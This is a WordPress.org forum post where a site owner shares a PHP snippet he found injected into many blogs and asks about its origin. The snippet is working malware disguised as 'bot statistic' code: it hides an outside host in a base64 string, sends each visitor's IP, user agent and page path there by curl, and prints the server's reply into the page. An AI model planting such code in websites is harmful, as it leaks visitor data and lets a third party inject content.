WordPress.org

Ready to get started?Download WordPress

Forums

Security Risks - Maleware Code (1 post)

  1. ceotron
    Member
    Posted 1 year ago #

    Hi,

    i have found this Code in a lot of Blogs of me, and some of my friends:

    <?php
    if (!isset($sRetry))
    {
    global $sRetry;
    $sRetry = 1;
        // This code use for global bot statistic
        $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
        $stCurlHandle = NULL;
        $stCurlLink = "";
        if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
        {
            if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics
            $stCurlLink = base64_decode( 'aHR0cDovL2Jyb3dzZXJnbG9iYWxzdGF0LmNvbS9zdGF0RC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
                @$stCurlHandle = curl_init( $stCurlLink );
        }
        }
    if ( $stCurlHandle !== NULL )
    {
        curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
        $sResult = @curl_exec($stCurlHandle);
        if ($sResult[0]=="O")
         {$sResult[0]=" ";
          echo $sResult; // Statistic code end
          }
        curl_close($stCurlHandle);
    }
    }
    ?>

    I haven't found a useful solution in the forum...!

    Does anyone know, where this comes from??

    Thank you,
    Patrick

Topic Closed

This topic has been closed to new replies.

About this Topic